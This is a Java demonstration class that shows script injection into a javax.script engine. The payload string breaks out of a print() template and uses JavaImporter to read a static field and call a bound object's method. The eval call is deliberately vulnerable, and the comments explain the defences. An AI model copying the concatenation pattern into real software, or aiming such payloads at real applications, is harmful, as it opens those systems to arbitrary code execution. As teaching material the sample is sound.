package hackTest;

import javax.script.Bindings;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;

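/**
 * Demonstrates script injection through {@code javax.script}: a string that
 * stands in for untrusted input is concatenated into the source text handed to
 * {@link ScriptEngine#eval(String)}, so the input is parsed as code instead of
 * being treated as data.
 *
 * <p>Defensive takeaways illustrated by this sample:
 * <ul>
 *   <li>Never build script source by string concatenation with external data.
 *       Pass the value through {@link Bindings} and reference it as a variable
 *       (for example {@code bindings.put("msg", input); engine.eval("print(msg)")}).</li>
 *   <li>Objects placed in the bindings ({@code user} here) are reachable by any
 *       script the engine runs, so expose only what the script really needs.</li>
 *   <li>When the engine offers Java interop (the payload relies on
 *       {@code JavaImporter} and {@code Packages}), restrict which classes
 *       scripts may load, e.g. with Nashorn's {@code ClassFilter}.</li>
 * </ul>
 */
public class ScriptAttack {
    /**
     * Runs the injection demonstration and prints the value the injected script
     * stored in the script variable {@code out}.
     *
     * @param args unused
     * @throws ScriptException if the engine fails to evaluate the script
     * @throws IllegalStateException if no engine is registered as {@code "javascript"}
     */
    public static void main(String[] args) throws ScriptException {
        // Read the value of a Java static field by means of script injection.
        //
        // The leading "heheda')" closes the string literal and the print( call
        // that the template below opens; everything after it runs as ordinary
        // statements. The trailing "//" comments out the "')" that the template
        // appends, which keeps the resulting script syntactically valid.
        // Content.s is presumably a static field of hackTest.Content (that
        // class is not shown in this file).
        String untrustedInput = "heheda');var x = 100;var out='';print(x);print(user.getName());var fimport = new JavaImporter(Packages.hackTest.Content);" +
                "with(fimport){" +
                "print(Content.s);out = Content.s} " +
                "//";

        ScriptEngineManager manager = new ScriptEngineManager();

        User user = new User();
        user.setName("gaugua");

        ScriptEngine engine = manager.getEngineByName("javascript");
        if (engine == null) {
            // getEngineByName returns null when no matching engine is found
            // (e.g. on a JDK that no longer bundles Nashorn); fail with a clear
            // message instead of a NullPointerException at eval().
            throw new IllegalStateException(
                    "No script engine registered under the name \"javascript\"");
        }

        // The manager-level bindings make "user" visible to the script, which
        // is why the injected code can call user.getName().
        Bindings globalBindings = manager.getBindings();
        globalBindings.put("user", user);

        // VULNERABLE ON PURPOSE: the input becomes part of the program text.
        // The safe form keeps the script constant and supplies the value as a
        // bound variable, e.g. put("msg", untrustedInput) then eval("print(msg)").
        String script = "print('" + untrustedInput + "')";
        engine.eval(script);

        // "out" was assigned by the injected statements, not by this program.
        System.out.println(engine.get("out"));
    }
}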
